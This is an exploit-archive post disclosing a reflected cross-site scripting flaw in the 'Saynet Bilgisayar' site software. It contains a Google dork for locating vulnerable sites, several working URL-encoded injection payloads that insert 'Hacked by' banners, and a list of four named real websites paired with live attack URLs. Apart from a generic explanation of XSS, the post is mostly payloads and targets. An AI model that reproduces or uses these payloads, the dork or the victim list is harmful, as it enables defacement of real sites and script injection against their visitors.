Saynet Bilgisayar Cross Site Scripting

2019.06.19
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################################################### # Exploit Title : Saynet Bilgisayar Cross Site Scripting # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 19/06/2019 # Vendor Homepage : say-net.com - saynet.com.tr # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ] # Google Dorks : intext:Saynet Bilgisayar site:tr # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Reference Link : cxsecurity.com/ascii/WLB-2019010038 ################################################################### Impact - Reflected XSS Cross Site Scripting (or Non-Persistent) : ********************************************************* The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim,the content is executed by the victim's browser. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected site and allow the attacker to access sensitive browser-based information. An attacker, for example,can exploit this vulnerability to steal cookies from the attacked user in order to hijack a session and gain access to the system. ################################################################### # XSS Cross Site Scripting Exploits and Payloads : ******************************************************* /?Syf=21&pt=1%27"></h3></tr></td></table></tr></td> </table></div><marquee>XSS-Vulnerability-Found-By-KingSkrupellos /?Syf=21&pt=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E /?Syf=[ID-NUMBER]&pt=1%27"></h3></tr></td></table> </tr></td></table></div><marquee>XSS-Vulnerability-Found-By-KingSkrupellos /?pnum=1&pt=1&pt=1%27%3Cmarquee %3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20 KingSkrupellos%3C/font%3E%3C/marquee%3E /?SyfNmb=2&pt=1%27<marquee><font%20color=lime%20size= 32>XSS-Vulnerability-Found%20By%20KingSkrupellos</font></marquee> ################################################################### # Example Vulnerable Sites : ************************* [+] sahintoptangida.com.tr/?Syf=21&pt=1%27"></h3></tr></td></table></tr> </td></table></div><marquee>XSS-Vulnerability-Found-By-KingSkrupellos [+] tesa.com.tr/?Syf=4&pt=1%27%22%3E%3C/h3%3E%3C/tr%3E%3C/td%3E %3C/table%3E%3C/tr%3E%3C/td%3E%3C/table%3E%3C/div%3E% 3Cmarquee%3EXSS-Vulnerability-Found-By-KingSkrupellos [+] drnyapi.com.tr/?pnum=5&pt=1%27%22%3E%3C/h3%3E%3C/tr%3E%3C /td%3E%3C/table%3E%3C/tr%3E%3C/td%3E%3C/table%3E%3C/div%3E %3Cmarquee%3EXSS-Vulnerability-Found-By-KingSkrupellos [+] abdulkadirgeylanidernegi.net/?Syf=21&pt=1%27<marquee> <font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> ################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ###################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top